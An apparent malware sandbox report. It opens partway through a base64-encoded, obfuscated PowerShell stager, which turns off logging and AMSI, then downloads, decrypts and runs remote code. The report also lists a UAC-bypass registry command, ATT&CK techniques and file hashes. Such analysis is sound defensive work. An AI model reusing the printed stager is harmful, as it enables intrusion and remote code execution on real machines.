HsAMgB9ACIAIAAtAGYAIAAnAHAAdAAnACwAJwBsACcALAAnAEIAJwAsACcAZQBTAGMAcgBpACcALAAnAEUAbgBhAGIAJwApACsAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwBnAGcAJwAsACcAbABvAGMAawBMAG8AJwAsACcAaQBuAGcAJwApACwAMAApADsAJAB7AHYAYABBAGwAfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAZAAnACwAJwBBAGQAJwApAC4ASQBuAHYAbwBrAGUAKAAoACIAewA0AH0AewAyAH0AewA3AH0AewAzAH0AewA1AH0AewA2AH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACcAbgB2AG8AYwBhAHQAJwAsACcAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAJwBhAGIAbAAnACwAJwBTAGMAcgBpAHAAJwAsACcARQBuACcALAAnAHQAQgBsAG8AYwAnACwAJwBrAEkAJwAsACcAZQAnACkALAAwACkAOwAkAHsAQwBgAEEANAA3ADgAfQBbACgAKAAoACIAewAxADIAfQB7ADIAfQB7ADEAOQB9AHsAMQA2AH0AewAxADQAfQB7ADEAfQB7ADEANQB9AHsANgB9AHsANQB9AHsAMQAwAH0AewAyADAAfQB7ADEAMwB9AHsAMgAxAH0AewAzAH0AewAxADEAfQB7ADEANwB9AHsANwB9AHsAOQB9AHsAMQA4AH0AewA0AH0AewA4AH0AewAwAH0AIgAtAGYAJwBpAHAAdABCACcALAAnAE4ARQB7ADAAfQAnACwAJwBLACcALAAnAGkAYwByACcALAAnAGUAJwAsACcAcgBlAHsAMAAnACwAJwBvAGYAdAB3AGEAJwAsACcAMAAnACwAJwBsAGwAewAwAH0AUwBjAHIAJwAsACcAfQBXAGkAbgBkACcALAAnAH0AJwAsACcAbwBzAG8AZgB0ACcALAAnAEgAJwAsACcAbABpAGMAaQBlACcALAAnAE0AQQBDAEgASQAnACwAJwBTACcALAAnAEEATABfACcALAAnAHsAJwAsACcAbwB3AHMAewAwAH0AUABvAHcAZQByAFMAaAAnACwAJwBFAFkAXwBMAE8AQwAnACwAJwBQAG8AJwAsACcAcwB7ADAAfQBNACcAKQApACAALQBmACAAWwBDAGgAYQBSAF0AOQAyACkAKwAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBnAGkAbgBnACcALAAnAGwAbwAnACwAJwBjAGsATABvAGcAJwApAF0APQAkAHsAVgBgAEEAbAB9AH0ARQBsAHMARQB7ACAAKAAmACgAIgB7ADIAfQB7ADAAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBBACcALAAnAEkAYQBCAGwARQAnACwAJwBnAEUAdAAtAHYAJwAsACcAcgAnACkAIAAgACgAIgBvACIAKwAiADgAMgBKACIAKQAgACAAKQAuAHYAQQBsAFUAZQAuACIARwBFAFQARgBJAGUAYABsAGQAIgAoACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAnAHMAaQBnACcALAAnAHUAcgBlAHMAJwAsACcAbgBhAHQAJwApACwAJwBOACcAKwAoACIAewAzAH0AewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAYwAnACwAJwBpACcALAAnACwAUwB0AGEAdABpAGMAJwAsACcAbwBuAFAAdQBiAGwAJwApACkALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAdQBlACcALAAnAGEATAAnACwAJwBTAGUAdABWACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AE4AVQBgAEwATAB9ACwAKAAmACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACcATwBiAEoAZQBjACcALAAnAHQAJwAsACcATgBFAFcALQAnACkAIAAoACIAewA1AH0AewAyAH0AewA2AH0AewAzAH0AewAxAH0AewAwAH0AewA0AH0AIgAtAGYAIAAnAE4AJwAsACcAVAByAGkAJwAsACcAdABJACcALAAnAGUAcgBpAEMALgBIAGEAcwBoAFMARQBUAFsAUwAnACwAJwBHAF0AJwAsACcAQwBPAEwAbABFAEMAJwAsACcAbwBuAHMALgBHAGUATgAnACkAKQApAH0AJAB7AFIAYABlAGYAfQA9ACAAIAAoACAAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBpAFIAJwAsACcAZAAnACkAIABWAEEAcgBJAEEAQgBsAEUAOgAxAEkAcQA2ACAAKQAuAHYAYQBsAFUARQAuACIAQQBgAFMAYABzAGUATQBiAEwAeQAiAC4AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBHAGUAJwAsACcAVABUAFkAcABlACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsANwB9AHsAMQB9AHsANAB9AHsAMwB9AHsAOQB9AHsAMAB9AHsANQB9AHsAMQAwAH0AewAyAH0AewA2AH0AewA4AH0AIgAgAC0AZgAgACcAZQBtAGUAbgB0AC4AQQAnACwAJwB5AHMAdABlAG0AJwAsACcAdABpAG8AbgAuACcALAAnAG4AJwAsACcALgBNAGEAJwAsACcAdQB0AG8AJwAsACcAQQAnACwAJwBTACcALAAnAG0AcwBpACcALAAnAGEAZwAnACwAJwBtAGEAJwApACsAKAAiAHsAMB9AHsAMQB9ACIAIAAtAGYAIAAnAFUAJwAsACcAdABpAGwAcwAnACkAKQA7ACQAewByAGAAZQBGAH0ALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAJwBpAEUAJwAsACcARwBlAHQARgAnACwAJwBMAGQAJwApAC4ASQBuAHYAbwBrAGUAKAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGEAbQBzACcALAAnAGkASQBuAGkAdABGACcAKQArACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAZQBkACcALAAnAGEAaQBsACcAKQAsACgAIgB7ADQAfQB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAGkAYwAnACwAJwBjACwAUwB0AGEAdAAnACwAJwB1AGIAbABpACcALAAnAG4AUAAnACwAJwBOAG8AJwApACkALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAFYAYQBsACcALAAnAFMARQBUACcALAAnAHUAZQAnACkALgBJAG4AdgBvAGsAZQAoACQAewBOAHUAYABMAEwAfQAsACQAewB0AGAAUgBVAEUAfQApADsAfQA7ACAAIAAkADAARQBTADYAOgA6ACIARQBYAHAARQBDAFQAYAAxADAAMABDAG8AbgB0AGAAaQBuAHUAZQAiAD0AMAA7ACQAewA0AGUAYAAxAGAAZQAxAH0APQAuACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAagBFAGMAVAAnACwAJwBiACcALAAnAEUAdwAtAE8AJwAsACcATgAnACkAIAAoACIAewAyAH0AewA0AH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AIgAgAC0AZgAgACcAZQBuAHQAJwAsACcALgBOAEUAdAAuAFcAJwAsACcAUwB5AFMAVABlACcALAAnAEMATABJACcALAAnAE0AJwAsACcARQBiACcAKQA7ACQAewBVAH0APQAoACIAewA5AH0AewAxAH0AewAxADMAfQB7ADIAfQB7ADcAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADEANAB9AHsAMQAyAH0AewA2AH0AewA1AH0AewAxADAAfQB7ADEANQB9AHsAMQAxAH0AewA4AH0AewAxADYAfQAiACAALQBmACcAdwBzACAAJwAsACcAbABsAGEAJwAsACcANQAuADAAIAAoAFcAJwAsACcATgBUACAANgAuACcALAAnAG4AZABvACcALAAnAFQAcgBpAGQAZQBuAHQALwA3AC4AJwAsACcAOwAgACcALAAnAGkAJwAsACcAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIAAnACwAJwBNAG8AegBpACcALAAnADAAJwAsACcAIAByACcALAAnACAAVwBPAFcANgA0ACcALAAnAC8AJwAsACcAMQA7ACcALAAnADsAJwAsACcARwBlAGMAawBvACcAKQA7ACQAewBTAGAARQBSAH0APQAkACgAIAAgACQAMwBiADIAOgA6ACIAVQBuAGAASQBjAGAAbwBkAGUAIgAuACIAZwBgAGUAdABgAHMAVABSAGkAbgBHACIAKAAgACgAIAAuACgAJwBsAHMAJwApACAAdgBBAHIASQBhAEIATABFADoATABqAE0AaQBxADYAKQAuAHYAQQBMAHUAZQA6ADoAKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBmACAAJwBGAHIAbwAnACwAJwBNAEIAYQBTAEUAJwAsACcAaQBuAGcAJwAsACcANgA0AFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsANwB9AHsAMQAwAH0AewAyADEAfQB7ADMAfQB7ADQAfQB7ADIANQB9AHsAMQAzAH0AewA2AH0AewAyADIAfQB7ADAAfQB7ADIAMAB9AHsAMQAxAH0AewAxADgAfQB7ADEANQB9AHsAMgB9AHsAMQA0AH0AewAyADYAfQB7ADUAfQB7ADIANAB9AHsAMgAzAH0AewA4AH0AewA5AH0AewAxADIAfQB7ADEANwB9AHsAMQA2AH0AewAxAH0AewAxADkAfQAiAC0AZgAgACcAdwBCACcALAAnAE8AQQBBAHgAQQBBAD0AJwAsACcAQQAnACwAJwBRAEEAJwAsACcAYwBBAEEANgBBAEMAOABBAEwAJwAsACcAMABBACcALAAnAEEAJwAsACcAYQBBAEIAMAAnACwAJwBBAFoAJwAsACcAUQBCADMAQQBHAEUAQQBlAFEAJwAsACcAQQAnACwAJwBwAEEASABJAEEAWgBRACcALAAnAEEAdQBBAEcAJwAsACcAQgBvAEEASABBACcALAAnAGIAQQBCAHMAQQAnACwAJwBHAEUAJwAsACcAQQAnACwAJwA0AEEAWgBRAEIAMABBAEQAbwAnACwAJwBCADMAQQAnACwAJwA9ACcALAAnAHEAQQBDADQAQQBaAGcAQgAnACwAJwBIACcALAAnAGMAJwAsACcAQgBoAEEASABRACcALAAnAFoAdwAnACwAJwB3ACcALAAnAEMAJwApACkAKQApADsAJAB7AFQAfQA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBlAHcAJwAsACcAcwAuAHAAaABwACcALAAnAC8AbgAnACkAOwAkAHsANABFADEAYABFADEAfQAuACIASABFAEEARABgAEUAUgBTACIALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcARABkACcALAAnAEEAJwApAC4ASQBuAHYAbwBrAGUAKAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcALQBBAGcAZQBuAHQAJwAsACcAcwBlAHIAJwAsACcAVQAnACkALAAkAHsAVQB9ACkAOwAkAHsANABgAEUAMQBgAEUAMQB9AC4AIgBwAHIAbwBgAFgAeQAiAD0AIAAgACgALgAoACIAewAyAH0AewAzAH0AewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQBiAEwARQAnACwAJwBSAEkAJwAsACcAZwBlAFQALQBWACcALAAnAEEAJwApACAAKAAnAHIASABMACcAKwAnAG4AZQAnACsAJwBDACcAKQAgAC0AVgBBAEwAdQBlAG8AbgApADoAOgAiAEQARQBmAGAAQQB1AGwAVAB3AGUAYgBgAFAAYABSAE8AeABZACIAOwAkAHsANABgAEUAMQBgAEUAMQB9AC4AIgBwAHIAbwBgAHgAeQAiAC4AIgBjAHIARQBEAGAAZQBOAHQASQBgAEEATABTACIAIAA9ACAAIAAgACgALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAEkAJwAsACcAdgBBAFIAJwAsACcAYQBCAEwAZQAnACkAIAAgACgAIgBvACIAKwAiADYAYQA4AGwAIgApACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBkAEUAZgBgAEEAdQBMAHQAbgBlAHQAVwBPAFIAYABLAGMAcgBgAGUAYABkAGUATgB0AGAAaQBBAEwAUwAiADsAJAB7AHMAYwBSAGAASQBgAFAAVAA6AHAAcgBgAE8AeAB5AH0AIAA9ACAAJAB7ADQAYABlADEAZQAxAH0ALgAiAHAAUgBgAG8AWABZACIAOwAkAHsASwB9AD0AIAAkAEkAYwA5ADcAOgA6ACIAYQBTAGAAQwBpAGkAIgAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAdABFAFMAJwAsACcAdABCAFkAJwAsACcARwBlACcAKQAuAEkAbgB2AG8AawBlACgAJwB9AGQAdABhAF0ARABZAD8AdQAmAEwASgAzAFoAYwBeAHoAUABJAHkAbQBlAGwALwB+AHsAUgAhADUAagBWADcAJwApADsAJAB7AHIAfQA9AHsAJAB7AEQAfQAsACQAewBLAH0APQAkAHsAYQBgAFIAZwBzAH0AOwAkAHsAUwB9AD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACYAKAAnACUAJwApAHsAJAB7AEoAfQA9ACgAJAB7AEoAfQArACQAewBTAH0AWwAkAHsAXwB9AF0AKwAkAHsAawB9AFsAJAB7AF8AfQAlACQAewBLAH0ALgAiAEMAYABvAFUAbgBUACIAXQApACUAMgA1ADYAOwAkAHsAUwB9AFsAJAB7AF8AfQBdACwAJAB7AHMAfQBbACQAewBKAH0AXQA9ACQAewBTAH0AWwAkAHsAagB9AF0ALAAkAHsAcwB9AFsAJAB7AF8AfQBdAH0AOwAkAHsAZAB9AHwALgAoACcAJQAnACkAewAkAHsASQB9AD0AKAAkAHsASQB9ACsAMQApACUAMgA1ADYAOwAkAHsAaAB9AD0AKAAkAHsASAB9ACsAJAB7AFMAfQBbACQAewBpAH0AXQApACUAMgA1ADYAOwAkAHsAUwB9AFsAJAB7AEkAfQBdACwAJAB7AHMAfQBbACQAewBIAH0AXQA9ACQAewBzAH0AWwAkAHsASAB9AF0ALAAkAHsAUwB9AFsAJAB7AGkAfQBdADsAJAB7AF8AfQAtAGIAeABPAFIAJAB7AHMAfQBbACgAJAB7AHMAfQBbACQAewBJAH0AXQArACQAewBzAH0AWwAkAHsAaAB9AF0AKQAlADIANQA2AF0AfQB9ADsAJAB7ADQARQAxAGAARQAxAH0ALgAiAGgARQBgAEEARABgAEUAUgBTACIALgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEQARAAnACwAJwBBACcAKQAuAEkAbgB2AG8AawBlACgAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAQwAnACwAJwBvAG8AawBpAGUAJwApACwAKAAiAHsAMQAwAH0AewAyAH0AewAxAH0AewA5AH0AewAwAH0AewAxADEAfQB7ADcAfQB7ADYAfQB7ADUAfQB7ADQAfQB7ADgAfQB7ADMAfQAiACAALQBmACAAJwArAEEAYgAnACwAJwBlACcALAAnAGwAWQAnACwAJwBWAG4AMgA3AGcAPQAnACwAJwBMACcALAAnAHkAJwAsACcAcQAnACwAJwBGAE0AaQAnACwAJwAxACcALAAnAD0AcQAvAEsAMgB6AHAASwBzAGoARwBhACcALAAnAFoAawBvAEcASgBWAFgAYQBZACcALAAnAC8AJwApACkAOwAkAHsAZABgAEEAdABBAH0APQAkAHsANABlAGAAMQBFADEAfQAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACcARABPAFcATgBsAE8AYQAnACwAJwBEAEQAJwAsACcAYQAnACwAJwBUAEEAJwApAC4ASQBuAHYAbwBrAGUAKAAkAHsAcwBgAEUAUgB9ACsAJAB7AFQAfQApADsAJAB7AEkAVgB9AD0AJAB7AGQAYQBgAFQAQQB9AFsAMAAuAC4AMwBdADsAJAB7AGQAQQBgAFQAQQB9AD0AJAB7AEQAQQBgAFQAQQB9AFsANAAuAC4AJAB7AGQAYQBgAFQAYQB9AC4AIgBMAGUAYABOAEcAYABUAEgAIgBdADsALQBqAG8AaQBOAFsAQwBoAEEAcgBbAF0AXQAoACYAIAAkAHsAUgB9ACAAJAB7AEQAYABBAHQAQQB9ACAAKAAkAHsASQBWAH0AKwAkAHsASwB9ACkAKQB8AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEUAWAAnACwAJwBJACcAKQA=
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
3⤵
- Modifies registry class
PID:744

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_17647fc8-7322-47db-9e1e-b200595723e5
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3426c921-9072-4b1d-8094-4d1651643ee2
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5ac8cbad-3573-4be3-8e25-5db7038b9999
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_80ca68a1-2577-4cf1-8058-4a08375caeb0
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_918156d4-6136-416a-a3a2-4fe41280ab06
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_caeb1944-8972-45ca-92ec-d5324abc2586
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dc9ef7e5-dec5-4063-8893-10c94ac855ab
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
2c934544851feb713d96b2730c0c5fa4

SHA1
04be24991979c393ab52397deac4b223f6847ed6

SHA256
fcb01d4697b219d5a242f95b1b050f35c5aced60a5e29b57794120f2d7031fef

SHA512
a1709c7669886ebca886aee574ee7600c0e75e5b53329c836bdd1f0342aa34b180ace4a43aaf9598c88017d00898c6a96625da471db6f1c89f49cb87faf2f4a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\84C9.tmp\84CA.tmp\84CB.bat
MD5
b07f82069680b2891164314108d122f2

SHA1
b52e5caf6409b2cce674efaa682f654771950a26

SHA256
e50e7295f32388cb6835da8cec37f42728c4bf911eef7c8a00baeaac847f3ee9

SHA512
f1b051012a65d8b11fc4b27a8399f34ea455b83a278b25450bd3c730901664db5e76109833113bb5834924d074790ef676e908598c3a611b1d048bd9a8758430

Download Submit
C:\Users\Admin\AppData\Local\Temp\8DDE.tmp\8DDF.tmp\8DE0.bat
MD5
192b7b3d073ae602bb0af4f2cde03542

SHA1
1d8d005a5fcf09e9f052f9c2746cfc837011012a

SHA256
583adbfdeb5c4499ce3407eaddbc0d734ee8b95e6bafdf6e3d0f89b8dc797d8e

SHA512
882548a4c0224346e829179a30baee83ba93019b47e6703c0f6dbba6a489800c1f6f5661afb0616df99f74b39a87e1f0b58bbeb0b61392fc46044418c944eab4

Download Submit
C:\Users\Admin\AppData\Local\Temp\AE68.tmp\AE69.tmp\AE6A.bat
MD5
62306dfd5af82e11a21035c369c81ca9

SHA1
aa6ada094c1515f71935d7ee177dd32a791b4d59

SHA256
1ae3241246b9622df9fdcc86d9c627d056637a358d34538639ccb911f401c739

SHA512
a784b6752bab922d4128be9a8bb55c3b493a948300d8c65659240a887b3a55e7d5b0d47ae450e1c03b62e58408f1225a4c55fcfd109ee90253d24403fae2d1e0

Download Submit
C:\Users\Admin\AppData\Roaming\Load.exe
MD5
e6952505d68d6a3f0e27344e0e5f13b6

SHA1
c99635248a2c413a3fd536b19666532b140399e3

SHA256
91576fd2e47c56e3c65d58f248d6855238bac7846da97431c5ff84c4c639597d

SHA512
48be46438293acaea4cb0a3ac6dcf0c71ca7e6b8bb4979cf993f08b63712d788e5bcb19a97a9ec5b3087d607e4c6040e2bcc7a80bc8ce5b5ecf7f09f1e7c9835

Download Submit
C:\Users\Admin\AppData\Roaming\Load.exe
MD5
e6952505d68d6a3f0e27344e0e5f13b6

SHA1
c99635248a2c413a3fd536b19666532b140399e3

SHA256
91576fd2e47c56e3c65d58f248d6855238bac7846da97431c5ff84c4c639597d

SHA512
48be46438293acaea4cb0a3ac6dcf0c71ca7e6b8bb4979cf993f08b63712d788e5bcb19a97a9ec5b3087d607e4c6040e2bcc7a80bc8ce5b5ecf7f09f1e7c9835

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
764b72398d90ea1d836cc252f64bd8a5

SHA1
e9723034f29d77717f1b59817d98fc10f0dfdfef

SHA256
2f15ef385badcad773aa3fc2e0ebf7c5b97ecb1e1382a52eac3943dc7131cc15

SHA512
fd45bab4d743fa756752482077c5d1b678268f46fc0e2a9f1595aa54c03bfcd19117616ec38cdbddacd415652baf341733e763677c2d214c572f888b06c07a27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
764b72398d90ea1d836cc252f64bd8a5

SHA1
e9723034f29d77717f1b59817d98fc10f0dfdfef

SHA256
2f15ef385badcad773aa3fc2e0ebf7c5b97ecb1e1382a52eac3943dc7131cc15

SHA512
fd45bab4d743fa756752482077c5d1b678268f46fc0e2a9f1595aa54c03bfcd19117616ec38cdbddacd415652baf341733e763677c2d214c572f888b06c07a27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
764b72398d90ea1d836cc252f64bd8a5

SHA1
e9723034f29d77717f1b59817d98fc10f0dfdfef

SHA256
2f15ef385badcad773aa3fc2e0ebf7c5b97ecb1e1382a52eac3943dc7131cc15

SHA512
fd45bab4d743fa756752482077c5d1b678268f46fc0e2a9f1595aa54c03bfcd19117616ec38cdbddacd415652baf341733e763677c2d214c572f888b06c07a27

Download Submit
C:\Users\Admin\AppData\Roaming\run.exe
MD5
b26ddb9eb21e13b28557ad7f745bb782

SHA1
390da6c974d3ce01cd42580ec1993da4ab4a6d3c

SHA256
0cd515f95efb36d901d827e8ca4338a323ac545746b073088429b90ce35322f2

SHA512
f1fb566975ae3f83e4ac1e81202544e763788c3ae241a73ac6ec71bbd010d3bad9c00d79edaa3ba8eae520ab3534abd066faad4e08bc971a9bb1c31553b66fc8

Download Submit
C:\Users\Admin\AppData\Roaming\run.exe
MD5
b26ddb9eb21e13b28557ad7f745bb782

SHA1
390da6c974d3ce01cd42580ec1993da4ab4a6d3c

SHA256
0cd515f95efb36d901d827e8ca4338a323ac545746b073088429b90ce35322f2

SHA512
f1fb566975ae3f83e4ac1e81202544e763788c3ae241a73ac6ec71bbd010d3bad9c00d79edaa3ba8eae520ab3534abd066faad4e08bc971a9bb1c31553b66fc8

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/316-9-0x0000000000000000-mapping.dmp

Download
memory/364-41-0x0000000000000000-mapping.dmp

Download
memory/428-96-0x0000000000000000-mapping.dmp

Download
memory/428-111-0x000000001AB30000-0x000000001AB32000-memory.dmp

Filesize
8KB

Download
memory/428-43-0x0000000000000000-mapping.dmp

Download
memory/428-112-0x000000001AB34000-0x000000001AB36000-memory.dmp

Filesize
8KB

Download
memory/428-105-0x000007FEF56B0000-0x000007FEF609C000-memory.dmp

Filesize
9.9MB

Download
memory/588-50-0x0000000000000000-mapping.dmp

Download
memory/604-38-0x0000000000000000-mapping.dmp

Download
memory/604-8-0x0000000000000000-mapping.dmp

Download
memory/616-17-0x0000000000000000-mapping.dmp

Download
memory/652-35-0x0000000000000000-mapping.dmp

Download
memory/684-24-0x0000000000000000-mapping.dmp

Download
memory/744-16-0x0000000000000000-mapping.dmp

Download
memory/784-40-0x0000000000000000-mapping.dmp

Download
memory/852-27-0x0000000000000000-mapping.dmp

Download
memory/864-22-0x0000000000000000-mapping.dmp

Download
memory/916-61-0x0000000002530000-0x0000000002531000-memory.dmp

Filesize
4KB

Download
memory/916-58-0x000000001A9C0000-0x000000001A9C2000-memory.dmp

Filesize
8KB

Download
memory/916-55-0x0000000002270000-0x0000000002271000-memory.dmp

Filesize
4KB

Download
memory/916-77-0x00000000028E0000-0x00000000028E1000-memory.dmp

Filesize
4KB

Download
memory/916-76-0x00000000028D0000-0x00000000028D1000-memory.dmp

Filesize
4KB

Download
memory/916-64-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/916-60-0x00000000023B0000-0x00000000023B1000-memory.dmp

Filesize
4KB

Download
memory/916-54-0x000007FEF56B0000-0x000007FEF609C000-memory.dmp

Filesize
9.9MB

Download
memory/916-59-0x000000001A9C4000-0x000000001A9C6000-memory.dmp

Filesize
8KB

Download
memory/916-52-0x0000000000000000-mapping.dmp

Download
memory/916-56-0x000000001ABF0000-0x000000001ABF1000-memory.dmp

Filesize
4KB

Download
memory/916-57-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/960-100-0x0000000000000000-mapping.dmp

Download
memory/968-46-0x0000000000000000-mapping.dmp

Download
memory/1036-48-0x0000000000000000-mapping.dmp

Download
memory/1132-31-0x0000000000000000-mapping.dmp

Download
memory/1156-49-0x0000000000000000-mapping.dmp

Download
memory/1160-3-0x0000000000000000-mapping.dmp

Download
memory/1204-21-0x0000000000000000-mapping.dmp

Download
memory/1256-20-0x0000000000000000-mapping.dmp

Download
memory/1284-37-0x0000000000000000-mapping.dmp

Download
memory/1312-7-0x0000000000000000-mapping.dmp

Download
memory/1472-42-0x0000000000000000-mapping.dmp

Download
memory/1484-39-0x0000000000000000-mapping.dmp

Download
memory/1496-10-0x0000000000000000-mapping.dmp

Download
memory/1496-11-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp

Filesize
8KB

Download
memory/1552-32-0x0000000000000000-mapping.dmp

Download
memory/1556-51-0x0000000000000000-mapping.dmp

Download
memory/1556-106-0x0000000000000000-mapping.dmp

Download
memory/1560-29-0x0000000000000000-mapping.dmp

Download
memory/1604-34-0x0000000000000000-mapping.dmp

Download
memory/1716-110-0x0000000000000000-mapping.dmp

Download
memory/1716-115-0x000007FEF56B0000-0x000007FEF609C000-memory.dmp

Filesize
9.9MB

Download
memory/1716-28-0x0000000000000000-mapping.dmp

Download
